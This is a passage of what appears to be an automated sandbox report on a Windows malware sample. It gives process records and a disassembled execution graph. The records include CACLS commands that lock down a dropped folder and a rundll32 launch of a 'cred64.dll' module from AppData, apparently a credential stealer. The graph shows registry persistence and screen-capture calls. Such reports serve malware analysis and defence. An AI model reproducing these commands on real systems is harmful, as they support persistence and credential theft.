                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              Imagebase:0xd90000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:11
                                                              Start time:10:32:19
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cacls.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:CACLS "..\9c69749b54" /P "user:N"
                                                              Imagebase:0xb50000
                                                              File size:27648 bytes
                                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Target ID:12
                                                              Start time:10:32:19
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cacls.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:CACLS "..\9c69749b54" /P "user:R" /E
                                                              Imagebase:0xb50000
                                                              File size:27648 bytes
                                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Target ID:13
                                                              Start time:10:32:20
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main
                                                              Imagebase:0xb0000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3.1%
                                                                Dynamic/Decrypted Code Coverage:9%
                                                                Signature Coverage:8.4%
                                                                Total number of Nodes:1549
                                                                Total number of Limit Nodes:22
                                                                execution_graph 17686 40b3f4 17687 40b405 17686->17687 17691 40b419 17686->17691 17688 40b828 17687->17688 17687->17691 17872 41cd1c 17688->17872 17690 40b82d 17692 41cd1c 25 API calls 17690->17692 17724 416b80 17691->17724 17696 40b832 17692->17696 17694 40b4a6 17738 402c70 17694->17738 17698 40b84b CopyFileA 17696->17698 17697 40b4b1 17835 417510 17697->17835 17701 405880 68 API calls 17698->17701 17700 40b4cd 17844 417190 17700->17844 17703 40b85d 17701->17703 17707 416b40 27 API calls 17703->17707 17719 40b8ad 17703->17719 17704 40b4e2 GetModuleFileNameA 17711 40b5d0 17704->17711 17705 40b8b7 17709 41cd1c 25 API calls 17705->17709 17706 41badf 23 API calls 17706->17705 17710 40b876 17707->17710 17712 40b8bc 17709->17712 17713 416b80 27 API calls 17710->17713 17711->17711 17852 417040 17711->17852 17714 40b891 17713->17714 17716 416b40 27 API calls 17714->17716 17717 40b8a4 17716->17717 17718 4043c0 28 API calls 17717->17718 17718->17719 17719->17705 17719->17706 17720 40b802 17865 418232 17720->17865 17722 40b5ec 17722->17705 17722->17720 17723 40b824 17725 416ba6 17724->17725 17726 416bad 17725->17726 17727 416c01 17725->17727 17728 416be2 17725->17728 17726->17694 17731 41843e 27 API calls 17727->17731 17735 416bf6 __wsopen_s 17727->17735 17729 416c39 17728->17729 17730 416be9 17728->17730 17891 402180 17729->17891 17877 41843e 17730->17877 17731->17735 17734 416bef 17734->17735 17736 41cd1c 25 API calls 17734->17736 17735->17694 17737 416c43 17736->17737 18085 402a40 17738->18085 17744 402d65 17746 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17744->17746 17745 402d8b 17747 41cd1c 25 API calls 17745->17747 17749 402d87 17746->17749 17750 402d90 ___scrt_fastfail 17747->17750 17748 402cdb 17748->17744 17748->17745 17749->17697 17751 402df7 RegOpenKeyExA 17750->17751 17752 402e50 RegCloseKey 17751->17752 17753 402e26 RegQueryValueExA 17751->17753 17754 402e76 17752->17754 17753->17752 17754->17754 17755 417040 27 API calls 17754->17755 17759 402e8e 17755->17759 17756 402ef6 17757 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17756->17757 17760 402f19 17757->17760 17758 402f1d 17761 41cd1c 25 API calls 17758->17761 17759->17756 17759->17758 17760->17697 17762 402f22 RegOpenKeyExA 17761->17762 17764 402f97 RegCloseKey 17762->17764 17765 402f6d RegSetValueExA 17762->17765 17766 402fa8 17764->17766 17765->17764 17767 40304e 17766->17767 17768 403066 17766->17768 17769 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17767->17769 17770 41cd1c 25 API calls 17768->17770 17771 403062 17769->17771 17772 40306b GdiplusStartup 17770->17772 17771->17697 18104 416c50 17772->18104 17776 4030f0 GetDC 17777 416b80 27 API calls 17776->17777 17778 4031eb 17777->17778 17779 402c70 42 API calls 17778->17779 17780 4031f6 17779->17780 17781 416b80 27 API calls 17780->17781 17782 403218 17781->17782 17783 402c70 42 API calls 17782->17783 17784 40321f 17783->17784 17785 416b80 27 API calls 17784->17785 17786 403234 17785->17786 17787 402c70 42 API calls 17786->17787 17788 40323b 17787->17788 17789 416b80 27 API calls 17788->17789 17790 403269 17789->17790 17791 402c70 42 API calls 17790->17791 17792 403274 17791->17792 17793 417190 27 API calls 17792->17793 17794 403288 17793->17794 17795 417190 27 API calls 17794->17795 17798 403299 17795->17798 17796 4037ad 17797 41cd1c 25 API calls 17796->17797 17800 4037c6 17797->17800 17798->17796 17799 4033db 17798->17799 17801 416b80 27 API calls 17799->17801 17802 40341b 17801->17802 17803 402c70 42 API calls 17802->17803 17804 403426 17803->17804 17805 403431 RegGetValueA 17804->17805 17806 40342f 17804->17806 17811 403461 17805->17811 17806->17805 17807 4034a2 GetSystemMetrics 17809 4034b0 17807->17809 17810 4034a9 17807->17810 17808 4034ab GetSystemMetrics 17808->17809 17812 416b80 27 API calls 17809->17812 17810->17808 17811->17807 17811->17808 17813 4034cb 17812->17813 17814 402c70 42 API calls 17813->17814 17815 4034d6 RegGetValueA 17814->17815 17817 40350b 17815->17817 17818 403546 GetSystemMetrics 17817->17818 17819 40354f GetSystemMetrics 17817->17819 17820 403554 6 API calls 17818->17820 17821 40354d 17818->17821 17819->17820 17822 4035e7 17820->17822 17833 403668 SelectObject DeleteObject DeleteObject ReleaseDC GdipDisposeImage 17820->17833 17821->17819 17823 41cd6d ___std_exception_copy 15 API calls 17822->17823 17824 4035ed 17823->17824 17826 4035fc GdipGetImageEncoders 17824->17826 17824->17833 17834 403610 17826->17834 17827 4036c8 17828 403759 GdiplusShutdown 17827->17828 17831 40376a 17828->17831 17829 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17832 4037a9 17829->17832 17830 41cb22 ___vcrt_freefls@4 14 API calls 17830->17833 17831->17829 17832->17697 17833->17827 17834->17830 17836 417570 17835->17836 17836->17836 18387 417c20 17836->18387 17838 417589 17840 4175a4 __InternalCxxFrameHandler 17838->17840 18399 417960 17838->18399 17840->17840 17841 417960 27 API calls 17840->17841 17843 4175f9 __InternalCxxFrameHandler 17840->17843 17842 417641 17841->17842 17842->17700 17843->17700 17845 417202 17844->17845 17846 4171b8 17844->17846 17849 417960 27 API calls 17845->17849 17851 417211 __InternalCxxFrameHandler 17845->17851 17846->17845 17847 4171c1 17846->17847 18412 417dc0 17847->18412 17849->17851 17850 4171ca 17850->17704 17851->17704 17854 417084 17852->17854 17855 41705e __InternalCxxFrameHandler 17852->17855 17853 41716e 17858 402180 Concurrency::cancel_current_task 27 API calls 17853->17858 17854->17853 17856 4170d8 17854->17856 17857 4170fd 17854->17857 17855->17722 17856->17853 17860 41843e 27 API calls 17856->17860 17861 41843e 27 API calls 17857->17861 17862 4170e9 __wsopen_s 17857->17862 17859 417178 17858->17859 17860->17862 17861->17862 17863 417150 17862->17863 17864 41cd1c 25 API calls 17862->17864 17863->17722 17864->17853 17866 41823b 17865->17866 17867 41823d IsProcessorFeaturePresent 17865->17867 17866->17723 17869 41827f 17867->17869 18433 418243 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17869->18433 17871 418362 17871->17723 17873 41cca8 __wsopen_s 25 API calls 17872->17873 17874 41cd2b 17873->17874 17875 41cd39 __wsopen_s 11 API calls 17874->17875 17876 41cd38 17875->17876 17879 418443 17877->17879 17880 41845d 17879->17880 17882 41845f 17879->17882 17908 41cd87 17879->17908 17911 41cd6d 17879->17911 17880->17734 17883 402180 Concurrency::cancel_current_task 17882->17883 17884 418469 17882->17884 17897 4194c4 17883->17897 17887 4194c4 std::_Xinvalid_argument RaiseException 17884->17887 17886 40219c 17900 419289 17886->17900 17889 418966 17887->17889 17892 40218e Concurrency::cancel_current_task 17891->17892 17893 4194c4 std::_Xinvalid_argument RaiseException 17892->17893 17894 40219c 17893->17894 17895 419289 ___std_exception_copy 26 API calls 17894->17895 17896 4021c3 17895->17896 17896->17734 17898 41950e RaiseException 17897->17898 17899 4194de 17897->17899 17898->17886 17899->17898 17901 419296 17900->17901 17907 4021c3 17900->17907 17901->17901 17902 41cd6d ___std_exception_copy 15 API calls 17901->17902 17901->17907 17903 4192b3 17902->17903 17904 4192c3 17903->17904 17918 41de2a 17903->17918 17927 41cb22 17904->17927 17907->17734 18074 41cdb4 17908->18074 17916 41eb6a _unexpected 17911->17916 17912 41eba8 17914 41c830 __dosmaperr 14 API calls 17912->17914 17913 41eb93 HeapAlloc 17915 41eba6 17913->17915 17913->17916 17914->17915 17915->17879 17916->17912 17916->17913 17917 41cd87 _unexpected 2 API calls 17916->17917 17917->17916 17919 41de37 17918->17919 17920 41de45 17918->17920 17919->17920 17923 41de5c 17919->17923 17930 41c830 17920->17930 17922 41de4d 17933 41cd0c 17922->17933 17925 41de57 17923->17925 17926 41c830 __dosmaperr 14 API calls 17923->17926 17925->17904 17926->17922 17928 41e681 _free 14 API calls 17927->17928 17929 41cb3a 17928->17929 17929->17907 17936 41f0cb GetLastError 17930->17936 17932 41c835 17932->17922 18056 41cca8 17933->18056 17935 41cd18 17935->17925 17937 41f0e2 17936->17937 17938 41f0e8 17936->17938 17959 41f4b2 17937->17959 17957 41f0ee SetLastError 17938->17957 17964 41f4f1 17938->17964 17944 41f116 17945 41f135 17944->17945 17946 41f11e 17944->17946 17948 41f4f1 _unexpected 6 API calls 17945->17948 17947 41f4f1 _unexpected 6 API calls 17946->17947 17949 41f12c 17947->17949 17950 41f141 17948->17950 17976 41e681 17949->17976 17951 41f145 17950->17951 17952 41f156 17950->17952 17953 41f4f1 _unexpected 6 API calls 17951->17953 17982 41eda0 17952->17982 17953->17949 17957->17932 17958 41e681 _free 12 API calls 17958->17957 17987 41f2f5 17959->17987 17961 41f4ce 17962 41f4d7 17961->17962 17963 41f4e9 TlsGetValue 17961->17963 17962->17938 17965 41f2f5 _unexpected 5 API calls 17964->17965 17966 41f50d 17965->17966 17967 41f106 17966->17967 17968 41f52b TlsSetValue 17966->17968 17967->17957 17969 420955 17967->17969 17970 420962 _unexpected 17969->17970 17971 4209a2 17970->17971 17972 42098d HeapAlloc 17970->17972 17975 41cd87 _unexpected 2 API calls 17970->17975 17973 41c830 __dosmaperr 13 API calls 17971->17973 17972->17970 17974 4209a0 17972->17974 17973->17974 17974->17944 17975->17970 17977 41e68c HeapFree 17976->17977 17981 41e6b5 __dosmaperr 17976->17981 17978 41e6a1 17977->17978 17977->17981 17979 41c830 __dosmaperr 12 API calls 17978->17979 17980 41e6a7 GetLastError 17979->17980 17980->17981 17981->17957 18000 41ec34 17982->18000 17988 41f323 17987->17988 17989 41f31f _unexpected 17987->17989 17988->17989 17993 41f22e 17988->17993 17989->17961 17992 41f33d GetProcAddress 17992->17989 17998 41f23f ___vcrt_InitializeCriticalSectionEx 17993->17998 17994 41f25d LoadLibraryExW 17995 41f278 GetLastError 17994->17995 17994->17998 17995->17998 17996 41f2d3 FreeLibrary 17996->17998 17997 41f2ea 17997->17989 17997->17992 17998->17994 17998->17996 17998->17997 17999 41f2ab LoadLibraryExW 17998->17999 17999->17998 18001 41ec40 ___scrt_is_nonwritable_in_current_image 18000->18001 18014 41df83 EnterCriticalSection 18001->18014 18003 41ec4a 18015 41ec7a 18003->18015 18006 41ed46 18007 41ed52 ___scrt_is_nonwritable_in_current_image 18006->18007 18019 41df83 EnterCriticalSection 18007->18019 18009 41ed5c 18020 41ef27 18009->18020 18011 41ed74 18024 41ed94 18011->18024 18014->18003 18018 41dfcb LeaveCriticalSection 18015->18018 18017 41ec68 18017->18006 18018->18017 18019->18009 18021 41ef36 __fassign 18020->18021 18023 41ef5d __fassign 18020->18023 18021->18023 18027 4226f1 18021->18027 18023->18011 18055 41dfcb LeaveCriticalSection 18024->18055 18026 41ed82 18026->17958 18028 422771 18027->18028 18030 422707 18027->18030 18031 41e681 _free 14 API calls 18028->18031 18053 4227bf 18028->18053 18029 422862 __fassign 14 API calls 18054 4227cd 18029->18054 18030->18028 18034 41e681 _free 14 API calls 18030->18034 18035 42273a 18030->18035 18032 422793 18031->18032 18033 41e681 _free 14 API calls 18032->18033 18036 4227a6 18033->18036 18040 42272f 18034->18040 18041 41e681 _free 14 API calls 18035->18041 18052 42275c 18035->18052 18042 41e681 _free 14 API calls 18036->18042 18037 41e681 _free 14 API calls 18038 422766 18037->18038 18043 41e681 _free 14 API calls 18038->18043 18039 42282d 18044 41e681 _free 14 API calls 18039->18044 18045 4222ce ___free_lconv_mon 14 API calls 18040->18045 18046 422751 18041->18046 18047 4227b4 18042->18047 18043->18028 18048 422833 18044->18048 18045->18035 18049 4223cc __fassign 14 API calls 18046->18049 18050 41e681 _free 14 API calls 18047->18050 18048->18023 18049->18052 18050->18053 18051 41e681 14 API calls _free 18051->18054 18052->18037 18053->18029 18054->18039 18054->18051 18055->18026 18057 41f0cb __dosmaperr 14 API calls 18056->18057 18058 41ccb3 18057->18058 18059 41ccc1 18058->18059 18064 41cd39 IsProcessorFeaturePresent 18058->18064 18059->17935 18061 41cd0b 18062 41cca8 __wsopen_s 25 API calls 18061->18062 18063 41cd18 18062->18063 18063->17935 18065 41cd45 18064->18065 18068 41cb60 18065->18068 18069 41cb7c ___scrt_fastfail 18068->18069 18070 41cba8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18069->18070 18073 41cc79 ___scrt_fastfail 18070->18073 18071 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18072 41cc97 GetCurrentProcess TerminateProcess 18071->18072 18072->18061 18073->18071 18075 41cdc0 ___scrt_is_nonwritable_in_current_image 18074->18075 18080 41df83 EnterCriticalSection 18075->18080 18077 41cdcb 18081 41ce07 18077->18081 18080->18077 18084 41dfcb LeaveCriticalSection 18081->18084 18083 41cd92 18083->17879 18084->18083 18118 416f00 18085->18118 18087 402a6a 18088 402ae0 18087->18088 18089 416f00 27 API calls 18088->18089 18092 402b14 18089->18092 18090 402c46 18093 402890 18090->18093 18092->18090 18131 41bfe0 18092->18131 18094 41843e 27 API calls 18093->18094 18096 40291a 18094->18096 18095 4029e8 18097 402a0e 18095->18097 18099 402a36 18095->18099 18096->18095 18374 417820 18096->18374 18098 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18097->18098 18100 402a32 18098->18100 18101 41cd1c 25 API calls 18099->18101 18100->17748 18102 402a3b 18101->18102 18105 416c68 18104->18105 18106 416c9b 18104->18106 18105->17776 18108 416d94 18106->18108 18110 416cf0 18106->18110 18111 416d17 18106->18111 18116 416d01 18106->18116 18107 41cd1c 25 API calls 18109 416da3 18107->18109 18112 402180 Concurrency::cancel_current_task 27 API calls 18108->18112 18110->18108 18113 416cfb 18110->18113 18115 41843e 27 API calls 18111->18115 18111->18116 18112->18116 18114 41843e 27 API calls 18113->18114 18114->18116 18115->18116 18116->18107 18117 416d78 18116->18117 18117->17776 18120 416f18 ___scrt_fastfail 18118->18120 18121 416f3f 18118->18121 18119 417028 18122 402180 Concurrency::cancel_current_task 27 API calls 18119->18122 18120->18087 18121->18119 18123 416f93 18121->18123 18124 416fb8 18121->18124 18125 417032 18122->18125 18123->18119 18126 41843e 27 API calls 18123->18126 18127 41843e 27 API calls 18124->18127 18129 416fa4 ___scrt_fastfail 18124->18129 18126->18129 18127->18129 18128 41cd1c 25 API calls 18128->18119 18129->18128 18130 41700a 18129->18130 18130->18087 18132 41bffc __fassign 18131->18132 18133 41bfee 18131->18133 18132->18092 18136 41bf53 18133->18136 18141 41bd8d 18136->18141 18140 41bf77 18140->18092 18142 41bdad 18141->18142 18148 41bda4 18141->18148 18142->18148 18155 41ef74 GetLastError 18142->18155 18149 41bf8c 18148->18149 18150 41bfc9 18149->18150 18152 41bf99 18149->18152 18340 41f6ef 18150->18340 18153 41bfa8 __fassign 18152->18153 18333 41f713 18152->18333 18153->18140 18156 41ef91 18155->18156 18157 41ef8b 18155->18157 18158 41f4f1 _unexpected 6 API calls 18156->18158 18181 41ef97 SetLastError 18156->18181 18159 41f4b2 _unexpected 6 API calls 18157->18159 18160 41efaf 18158->18160 18159->18156 18161 420955 _unexpected 14 API calls 18160->18161 18160->18181 18163 41efbf 18161->18163 18164 41efc7 18163->18164 18165 41efde 18163->18165 18168 41f4f1 _unexpected 6 API calls 18164->18168 18170 41f4f1 _unexpected 6 API calls 18165->18170 18166 41bdcd 18182 41f66d 18166->18182 18167 41f02b 18190 41dde6 18167->18190 18172 41efd5 18168->18172 18171 41efea 18170->18171 18174 41efff 18171->18174 18175 41efee 18171->18175 18178 41e681 _free 14 API calls 18172->18178 18177 41eda0 _unexpected 14 API calls 18174->18177 18176 41f4f1 _unexpected 6 API calls 18175->18176 18176->18172 18179 41f00a 18177->18179 18178->18181 18180 41e681 _free 14 API calls 18179->18180 18180->18181 18181->18166 18181->18167 18183 41f680 18182->18183 18185 41bde3 18182->18185 18183->18185 18290 42293d 18183->18290 18186 41f69a 18185->18186 18187 41f6c2 18186->18187 18188 41f6ad 18186->18188 18187->18148 18188->18187 18312 42172c 18188->18312 18201 422060 18190->18201 18193 41ddf6 18195 41de00 IsProcessorFeaturePresent 18193->18195 18200 41de1f 18193->18200 18196 41de0c 18195->18196 18198 41cb60 __InternalCxxFrameHandler 8 API calls 18196->18198 18198->18200 18231 41baa3 18200->18231 18234 421f92 18201->18234 18204 4220ae 18205 4220ba ___scrt_is_nonwritable_in_current_image 18204->18205 18206 41f0cb __dosmaperr 14 API calls 18205->18206 18210 4220e7 __InternalCxxFrameHandler 18205->18210 18212 4220e1 __InternalCxxFrameHandler 18205->18212 18206->18212 18207 42212c 18209 41c830 __dosmaperr 14 API calls 18207->18209 18208 422116 18208->18193 18211 422131 18209->18211 18215 422158 18210->18215 18244 41df83 EnterCriticalSection 18210->18244 18213 41cd0c __wsopen_s 25 API calls 18211->18213 18212->18207 18212->18208 18212->18210 18213->18208 18217 4221a0 18215->18217 18218 422295 18215->18218 18228 4221cb 18215->18228 18217->18228 18245 4220a5 18217->18245 18219 4222a0 18218->18219 18252 41dfcb LeaveCriticalSection 18218->18252 18221 41baa3 __InternalCxxFrameHandler 23 API calls 18219->18221 18222 4222a8 18221->18222 18225 41ef74 _unexpected 37 API calls 18229 42221f 18225->18229 18227 4220a5 __InternalCxxFrameHandler 37 API calls 18227->18228 18248 422241 18228->18248 18229->18208 18230 41ef74 _unexpected 37 API calls 18229->18230 18230->18208 18254 41b97d 18231->18254 18235 421f9e ___scrt_is_nonwritable_in_current_image 18234->18235 18240 41df83 EnterCriticalSection 18235->18240 18237 421fac 18241 421fea 18237->18241 18240->18237 18242 41dfcb __InternalCxxFrameHandler LeaveCriticalSection 18241->18242 18243 41ddeb 18242->18243 18243->18193 18243->18204 18244->18215 18246 41ef74 _unexpected 37 API calls 18245->18246 18247 4220aa 18246->18247 18247->18227 18249 422210 18248->18249 18250 422247 18248->18250 18249->18208 18249->18225 18249->18229 18253 41dfcb LeaveCriticalSection 18250->18253 18252->18219 18253->18249 18255 41b98b 18254->18255 18256 41b99d 18254->18256 18282 418c69 GetModuleHandleW 18255->18282 18266 41b824 18256->18266 18260 41b9d6 18265 41b9e0 18267 41b830 ___scrt_is_nonwritable_in_current_image 18266->18267 18268 41df83 __InternalCxxFrameHandler EnterCriticalSection 18267->18268 18269 41b83a 18268->18269 18270 41b890 __InternalCxxFrameHandler 14 API calls 18269->18270 18271 41b847 18270->18271 18272 41b865 __InternalCxxFrameHandler LeaveCriticalSection 18271->18272 18273 41b853 18272->18273 18273->18260 18274 41b9e1 18273->18274 18275 41dfe2 __InternalCxxFrameHandler 6 API calls 18274->18275 18276 41b9eb 18275->18276 18277 41ba10 18276->18277 18278 41b9f0 GetPEB 18276->18278 18280 41ba23 __InternalCxxFrameHandler GetModuleHandleExW GetProcAddress FreeLibrary 18277->18280 18278->18277 18279 41ba00 GetCurrentProcess TerminateProcess 18278->18279 18279->18277 18281 41ba18 ExitProcess 18280->18281 18283 418c75 18282->18283 18283->18256 18284 41ba23 GetModuleHandleExW 18283->18284 18285 41ba42 GetProcAddress 18284->18285 18286 41ba65 18284->18286 18289 41ba57 18285->18289 18287 41b99c 18286->18287 18288 41ba6b FreeLibrary 18286->18288 18287->18256 18288->18287 18289->18286 18291 422949 ___scrt_is_nonwritable_in_current_image 18290->18291 18292 41ef74 _unexpected 37 API calls 18291->18292 18293 422952 18292->18293 18300 422998 18293->18300 18303 41df83 EnterCriticalSection 18293->18303 18295 422970 18304 4229be 18295->18304 18300->18185 18301 41dde6 IsInExceptionSpec 37 API calls 18302 4229bd 18301->18302 18303->18295 18305 4229cc __fassign 18304->18305 18307 422981 18304->18307 18306 4226f1 __fassign 14 API calls 18305->18306 18305->18307 18306->18307 18308 42299d 18307->18308 18311 41dfcb LeaveCriticalSection 18308->18311 18310 422994 18310->18300 18310->18301 18311->18310 18313 41ef74 _unexpected 37 API calls 18312->18313 18314 421736 18313->18314 18317 421644 18314->18317 18318 421650 ___scrt_is_nonwritable_in_current_image 18317->18318 18319 42166a 18318->18319 18328 41df83 EnterCriticalSection 18318->18328 18321 421671 18319->18321 18323 41dde6 IsInExceptionSpec 37 API calls 18319->18323 18321->18187 18324 4216e3 18323->18324 18325 42167a 18326 41e681 _free 14 API calls 18325->18326 18327 4216a6 18325->18327 18326->18327 18329 4216c3 18327->18329 18328->18325 18332 41dfcb LeaveCriticalSection 18329->18332 18331 4216ca 18331->18319 18332->18331 18334 41bd8d __fassign 37 API calls 18333->18334 18335 41f730 18334->18335 18338 41f740 18335->18338 18345 422551 18335->18345 18337 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18339 41f7dc 18337->18339 18338->18337 18339->18153 18341 41ef74 _unexpected 37 API calls 18340->18341 18342 41f6fa 18341->18342 18343 41f66d __fassign 37 API calls 18342->18343 18344 41f70a 18343->18344 18344->18153 18346 41bd8d __fassign 37 API calls 18345->18346 18347 422571 18346->18347 18360 41ebb8 18347->18360 18349 42262f 18351 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18349->18351 18350 42259e 18350->18349 18356 4225c4 __alloca_probe_16 ___scrt_fastfail 18350->18356 18363 41eb6a 18350->18363 18353 422652 18351->18353 18353->18338 18354 422629 18370 422654 18354->18370 18356->18354 18357 41ebb8 __fassign MultiByteToWideChar 18356->18357 18358 422612 18357->18358 18358->18354 18359 422619 GetStringTypeW 18358->18359 18359->18354 18361 41ebc9 MultiByteToWideChar 18360->18361 18361->18350 18364 41eba8 18363->18364 18368 41eb78 _unexpected 18363->18368 18366 41c830 __dosmaperr 14 API calls 18364->18366 18365 41eb93 HeapAlloc 18367 41eba6 18365->18367 18365->18368 18366->18367 18367->18356 18368->18364 18368->18365 18369 41cd87 _unexpected 2 API calls 18368->18369 18369->18368 18371 422660 18370->18371 18373 422671 18370->18373 18372 41e681 _free 14 API calls 18371->18372 18371->18373 18372->18373 18373->18349 18375 417949 18374->18375 18376 417843 18374->18376 18379 402180 Concurrency::cancel_current_task 27 API calls 18375->18379 18377 417885 18376->18377 18378 4178af 18376->18378 18377->18375 18380 417890 18377->18380 18382 41843e 27 API calls 18378->18382 18385 417896 __wsopen_s 18378->18385 18379->18385 18381 41843e 27 API calls 18380->18381 18381->18385 18382->18385 18383 41cd1c 25 API calls 18384 417958 18383->18384 18385->18383 18386 41790b __wsopen_s 18385->18386 18386->18096 18388 417c3b 18387->18388 18398 417d24 __wsopen_s 18387->18398 18389 417db1 18388->18389 18390 417cd1 18388->18390 18391 417caa 18388->18391 18397 417cbb __wsopen_s 18388->18397 18388->18398 18392 402180 Concurrency::cancel_current_task 27 API calls 18389->18392 18395 41843e 27 API calls 18390->18395 18390->18397 18391->18389 18394 41843e 27 API calls 18391->18394 18393 417dbb 18392->18393 18394->18397 18395->18397 18396 41cd1c 25 API calls 18396->18389 18397->18396 18397->18398 18398->17838 18400 41798b 18399->18400 18401 417aae 18399->18401 18403 4179d2 18400->18403 18404 4179fc 18400->18404 18402 402180 Concurrency::cancel_current_task 27 API calls 18401->18402 18410 4179e3 __wsopen_s 18402->18410 18403->18401 18405 4179dd 18403->18405 18406 41843e 27 API calls 18404->18406 18404->18410 18408 41843e 27 API calls 18405->18408 18406->18410 18407 41cd1c 25 API calls 18409 417abd 18407->18409 18408->18410 18410->18407 18411 417a6c __wsopen_s 18410->18411 18411->17840 18413 417dd4 18412->18413 18416 417de5 __InternalCxxFrameHandler __wsopen_s 18413->18416 18417 417ef0 18413->18417 18415 417e6b 18415->17850 18416->17850 18418 418029 18417->18418 18419 417f1b 18417->18419 18420 402180 Concurrency::cancel_current_task 27 API calls 18418->18420 18421 417f62 18419->18421 18422 417f89 18419->18422 18427 417f73 __wsopen_s 18420->18427 18421->18418 18423 417f6d 18421->18423 18425 41843e 27 API calls 18422->18425 18422->18427 18424 41843e 27 API calls 18423->18424 18424->18427 18425->18427 18426 41cd1c 25 API calls 18429 418038 18426->18429 18427->18426 18428 417ff1 __wsopen_s 18427->18428 18428->18415 18430 41806a 18429->18430 18431 41cd1c 25 API calls 18429->18431 18430->18415 18432 41808e 18431->18432 18433->17871 18434 41e4df 18439 41e2b5 18434->18439 18437 41e51e 18440 41e2d4 18439->18440 18441 41e2e7 18440->18441 18446 41e2fc 18440->18446 18442 41c830 __dosmaperr 14 API calls 18441->18442 18443 41e2ec 18442->18443 18444 41cd0c __wsopen_s 25 API calls 18443->18444 18445 41e2f7 18444->18445 18445->18437 18456 4236bf 18445->18456 18454 41e41c 18446->18454 18459 422f4e 18446->18459 18447 41c830 __dosmaperr 14 API calls 18448 41e4cd 18447->18448 18449 41cd0c __wsopen_s 25 API calls 18448->18449 18449->18445 18451 41e46c 18452 422f4e 37 API calls 18451->18452 18451->18454 18453 41e48a 18452->18453 18453->18454 18455 422f4e 37 API calls 18453->18455 18454->18445 18454->18447 18455->18454 18491 423084 18456->18491 18460 422fa5 18459->18460 18461 422f5d 18459->18461 18473 422fbb 18460->18473 18463 422f63 18461->18463 18465 422f80 18461->18465 18464 41c830 __dosmaperr 14 API calls 18463->18464 18467 422f68 18464->18467 18469 41c830 __dosmaperr 14 API calls 18465->18469 18472 422f9e 18465->18472 18466 422f73 18466->18451 18468 41cd0c __wsopen_s 25 API calls 18467->18468 18468->18466 18470 422f8f 18469->18470 18471 41cd0c __wsopen_s 25 API calls 18470->18471 18471->18466 18472->18451 18474 422fe5 18473->18474 18475 422fcb 18473->18475 18477 423004 18474->18477 18478 422fed 18474->18478 18476 41c830 __dosmaperr 14 API calls 18475->18476 18479 422fd0 18476->18479 18481 423010 18477->18481 18482 423027 18477->18482 18480 41c830 __dosmaperr 14 API calls 18478->18480 18483 41cd0c __wsopen_s 25 API calls 18479->18483 18484 422ff2 18480->18484 18485 41c830 __dosmaperr 14 API calls 18481->18485 18487 41bd8d __fassign 37 API calls 18482->18487 18490 422fdb 18482->18490 18483->18490 18488 41cd0c __wsopen_s 25 API calls 18484->18488 18486 423015 18485->18486 18489 41cd0c __wsopen_s 25 API calls 18486->18489 18487->18490 18488->18490 18489->18490 18490->18466 18493 423090 ___scrt_is_nonwritable_in_current_image 18491->18493 18492 423097 18494 41c830 __dosmaperr 14 API calls 18492->18494 18493->18492 18496 4230c2 18493->18496 18495 42309c 18494->18495 18497 41cd0c __wsopen_s 25 API calls 18495->18497 18502 423651 18496->18502 18501 4230a6 18497->18501 18501->18437 18515 41be10 18502->18515 18507 423687 18509 4230e6 18507->18509 18510 41e681 _free 14 API calls 18507->18510 18511 423119 18509->18511 18510->18509 18512 42311f 18511->18512 18514 423143 18511->18514 19052 41ff89 LeaveCriticalSection 18512->19052 18514->18501 18516 41bd8d __fassign 37 API calls 18515->18516 18517 41be22 18516->18517 18518 41be34 18517->18518 18570 41f3b8 18517->18570 18520 41bd70 18518->18520 18576 41bcbe 18520->18576 18523 4236df 18614 42342d 18523->18614 18526 423711 18529 41c81d __dosmaperr 14 API calls 18526->18529 18527 42372a 18632 41ffac 18527->18632 18530 423716 18529->18530 18534 41c830 __dosmaperr 14 API calls 18530->18534 18532 423738 18535 41c81d __dosmaperr 14 API calls 18532->18535 18533 42374f 18645 423398 CreateFileW 18533->18645 18537 423723 18534->18537 18538 42373d 18535->18538 18537->18507 18539 41c830 __dosmaperr 14 API calls 18538->18539 18539->18530 18540 423805 GetFileType 18542 423810 GetLastError 18540->18542 18543 423857 18540->18543 18541 4237da GetLastError 18545 41c7fa __dosmaperr 14 API calls 18541->18545 18546 41c7fa __dosmaperr 14 API calls 18542->18546 18647 41fef7 18543->18647 18544 423788 18544->18540 18544->18541 18646 423398 CreateFileW 18544->18646 